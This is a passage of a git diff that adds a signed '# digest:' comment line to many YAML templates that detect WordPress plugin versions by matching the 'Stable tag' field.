a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205472a339120027ef7c09d71389d709f7447a08dc0117238cf744e7b8543d281f022100b43a9694b9f5bc7cd15fe49a6f35eb1d07c40f526f911dbeeb3c2d0eaa74ae5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..6e11be02f9 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d2d4c1681b4d4ea63d099f51021e5803f6c4147be6e42d87f4801c1e027ae23022079bf6cec4d6983d44067dd0223e7cb1cd12dfe66f2dc53e9b73168413830e54d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..b5faa006ed 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b621f62d824d13ed53993b77866df5e0a70305794746925577a513b10edd05f4022100ee728f08b55472761974af86c16425e60f923665c2ef234cbfe273d642894f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..19657ac897 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203fe945b3f29e947ff7e8d4529e630571254807df2573f63dcce8450855326642022100f45a6712f47153bccb88b254a9e9855a3c5d37aed12d12206e265a2f2a9f63fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..09b3b814b9 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022051bd3087bfbe0e804b6d5c4dbb7d503aee676c01da336ac5b657e4a11a06d5b50221008073ef65d8e23bab9874e2edcfca45864c15cbee3dfc95a17bea42dc6b9770ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..c084451bdd 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201f9b683cb9f1468e659767445ac6d27677f7e2e009ec11f74cda55e2eee9abb80221009b2ee4b2b97cc32b4611774099e6ac1c478caa9fb01bc95fd9a8df0ce0eb3cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..c0d0fc40af 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d9ae0ae0dd8dcb632e9a681e5f99ab6bcf9e9bc97780082b4bd62914cee8d4f022100f1fcc820e911037b39ee5fff304dc69a50da9106f53ed20f8677c4f74a755331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..591f2942b4 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073d08d77a92d7cdc123cfc788cc7cf2c7bc547a4acdf8bffa2fe68a579169f77022047f2d93d2c17702073da3ba0b94c27c0217357d88d28b0e6c51883f63e9cacbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..a9f91a7d7d 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030dc21bdae8b741a4950dfa1b13166be2a9cba754583018d48611ce3a8f618eb0220791ba548a3e587f9b7fe8b56078a9145bb008a3bf5646329cb9545c24d035f85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..30fab7d4db 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f3212023a7fa445a9d90e89470c1fe5d3132b8c6cd5a589ffca3028cf5d8740022100ddb9ed1445c44ec4e10cf6f4dc5e9fe18919977fadd107634cd7d6cc7ebc2c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..412bf0bddc 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220467a62ce7387b8f5461f98e79f783c4d7368e8b84964b61492154981f04833f80220567d4c039df1381f409b5f4520cc6643dd56ab10ca2a9a704550085d07a7c541:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..863d58fd9d 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a1b0472d13d229ac1b8d6c9d30f85e61c9729d405bef6697da05ca17cff2e4902210099b019cb336179c139baf5feea0eced58a1fda8d5a4ccd4704f040a946f5cfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..f175ce85e6 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045d8b98b1f45deb6adc212834a0cd3b2441a58335b99a4264410481cd105099d022025e339102a2a67a72b789bbf8454415d1d4039619b3a9bf4e8a5d1dccdf01ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..2dcc065e2a 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100accc14eaa1ab29e67e8c89188bcab9b40261b319de0f1883b850cd8a050513330221009783ace3ec04851123cafdc800be3af9f0ca62ed27158fe77b4214c862be6783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..96dd52682f 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210092dc526e697195e7fd5a7becebfc17ca56393a7aef5e862f0eec751308260fc8022100a5e165d4699d1975c35444112b551a6a0b4c26b27da0b171d61e1fb2fc1b2af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..d90407123e 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206c92a3e040b3c899c84f2d448415f2c0ae030165b32d7605afa9bdf30618c25d022100996e0520a30c294a6c93ce1a0f93c3b6a112c9e7866fce58533bda8de99fcb7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..ee126f3dc4 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf9b3bf470af8b653334d63ab6f2dbdf55cd51b90527083c91b25e2d49a4c8b20220142ccbc4fc3b697c8a7b5bcc4c5299dac73718d03172fd5b917df87201cc6413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..95e3046fd5 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008abc2bf1b839a386608c25d22f12d9ec786a927623d9d14afe12f8df0aefa15202200d328257f70f659d7c767b88112ce1b3389aaf956f88bd6879b9f984cc91f4f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..31bc28ae03 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200da173e4d82f155b861bf7435c0da2b139fba2de05827dc84a94d4624d83173002206d08d59e6eebc0ebb3c00de11b3f88e75c4e7840a617e0b332fc246c36a6a1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..0dac7fa3cf 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206af07fff3aff398155ab5ff7dc33556a1586b2572ce0994e3c00407ceff923e6022100f39e99684c4254d88b7d815845ab223b1bcc00c80e540635f5325317981ba416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..8a60c0a7b9 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220063572786fbc0ba2ba12e0d70dd64a191be05596ab517ba226d6eda62166caff02201f1ca813cf47a94d143715f5de2d944fc661b5377bb84fee864b6ba0c98d4c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..add19555e8 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022006560ecb1d6aaf4ba5be258f0f3d812478cd46e4c5363cd23b135913688d0224022072381b7e8d433a04d3c7c2cda9fd5552095adca29ec79498d0100029955a2536:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..11b5382905 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d7c632b9473e5b74627c2a84d80275b84000366ac6f29a70c258be7b5dc6f35022100e43df9f96559b337488ae94f9dc56a5b12aceba7f8413486a31cebafcb2af419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..2b0050ed5d 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e8e0cb796ea8619637c57010e6818ae33b6d43752912ab10d949407c8adb590a022100a966c7e3bc1e15da0a51e745d9589863e43acf2793276f850ac7fe57f5e06f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..bccd70d01f 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c98916f9470a625b2a1480c0f51e16ae6f70fe05f3930c96243c6217e243287022059f928b4c5c3adbd3fdaff34bc89c728d93979bfde3c4df0697116aecf7b5cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..41ec33eaf9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad33122255a5b56a82b57754bb5e560cd0dc1ab54c498a26b1cffbe684d43b5b022100f92b8e8cd9b891e968fa6751ad93e185c2bfc23762c367426ec6acf763127c16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..8cabeba8fc 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d78dbe882cdf3f350fe112615a54ff4326ac4d142d4b7350e3bc39be6b4278da02206f8dd6447dd3d1faba36fde2cf26184e19376411d82f54556079ffa728ac5162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..6124f1d152 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d806f7034157f5f6d280730223094234358f3bf03406f25b08ac132aef0840c302204bf8a54f6882c3951e3c54204c070bb167beeebec1e82e709b0d67bffdcfbe34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..722220fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205114e19bebba78f8e1f43e8001b2976a14d75b929beeea56adcbe0e0733e462902210080ea875e985993b04a7966b0c1a29f6fb00dbfd09c53d9854a3877342da5a120:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..be4d77bedb 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085c2fadc0ce842d579235159adff414201e55825df460d6ee9d64d2bba86da4b022100c91e12672a026ce28b25fdc733639c24fa6fe6fdc0cbdbda8c46ad061dc3d4c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..5885850564 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d56fdc3cbdafadc3e3cf5c42ebd1cf839204353555e189516a30d166e0dd25660220434ab72b3f1ff47d443097b6484022e4a31f04562b415c85d824640e3f0112a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..7055bac3a7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220154e744a00ab4bbf505baa00c963f8cfc750babce6bd66a81d37c3be867e318f02210098412998c92c32a31c113445d65b731ef5cd919ac74f094b5e292d4468b18a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..8362b0a59b 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040665f58dd16cba80533650056e9fd1915238e09217e9b3012da0f89870a4e93022100cfa44ba30444c03c26c7ab27b1bd307e760d30fb5311f9e9e2a7636836f914e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..9ef80600be 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a52b34b53aff49ea5bc1412c28b554d4b6a816effbfb06f018054c5d59c8f0a02206780cc82268f1b20b5868f5bf416142735cff61fdc1193e5bc3009c3c383fc89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..0d32114f91 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220663ac2a6371fb527570b274d640187a5b51ab6a03dc083e743556c46f1ef0b07022059eb67479bdf40d8b882abb414b35d00cf235004f61829c8c9f154055cc080ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..8fae12a5ef 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204fcc6eb605b690c38319aeedb86d1424177b4357123ea25a3b5375abeef4569002205c8a0a2dd64dbeaf0c18c6f39146eef7e1a3051bbf41a34e62abab1a67d1c48e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..e141be519e 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203edb6a2a9594e958b42f9a53572f61b1682c8e186c2894f159ef1027d2cdf659022068819d039d16f5e312cf032bdc8ff366fe253a7af9e4d3173429f011c79611a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..71b6bba44a 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220276b3034ee2ad0af8b34b4e1126b73e16e521982eada557b05a55faa2fb878e502205df012a1714bbb2ba289d1d2535177f4efb3e611749fadcd9c087852630469f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..1176041ed1 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202b11ddeaaad7a35ed935c3aa5c92537f7d035f255e7c11cf3411beeb7d5e9ad102204f1f6de073bd9fdd1a1fa74c883f62e5aea610dd091c393dfe75e4528ab59f10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..3b25b15546 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205741813b7eebd9a1619373d3a07896b28aaa306d32d1ff5fffef7cdda8f8ae2d02200dce38d38b8be9329ec0eed83ecc1bb3f318d68ce8a8629e35c04e1ce0199af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..b34cee5478 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203cd90e5b991c8e91fa97b8c7e309c8475f691ec0b7704c9a81747002bd6a2175022100cc713a6464135d4d86625c74a182fbdfc5e91858efbc932313a140fd586976d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..5ff8094eeb 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f0965084183d5945832f2a0218a706b6ed12a76a573bf4f6c2476af77d8a56a02200a1aa89de81f8350e490cd39b7379014ac9a4831cb1b6260a395ba1363a2685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..d3d257467d 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082dceb4eea25d3a0ed79b14e2dcd1ef814c04df0c2ed8ceaf897271744bec99302202c3ff12e793400ddc6eaef5670c195559d0f46a437aca01a25833c8ea1fdf872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..347a976b12 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd3301e6ddcd48240427a026588a2e0f75337d28776bfc88c6695a95d9e84940022100ea4bcfc7d90c3adf62ac2721805e4757787cccefd4664c864f8d7638ac507d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..6928e4e17d 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033fc8500446853068ff183a388500a6db114d36fff0a51b5ba563313dbd0eb01022100f950b72e5aff74a5841c14dde97b0f86306353d1fec7fa2e4e96a75312af1862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..ed332c59bd 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015344364ca01879b5b2f1b535294566022ca49d4656aac0aacbccf4794b5fc6d02205a2199182d2761951dff13b5bb72d60783a0e3f0d12d1421750f1589e62a33f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..a2224608f9 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b138e17174d48a651ec5bfebe610a975cc1f324635eac14a654f9487e8de26bd022100d08fb9ea0d0029807fe44e07e99189eed3fc0be8539d207c59e5f1a9acee06b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..f6e4da7338 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022915038d5d743962b4b9284a03c83d9bb0cf8baabe07b36d04769a75fdfedb802204f8031913b6b6ca8a6a82e57057462ce01c0b49508a81a21ac8f1c8d4e100bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 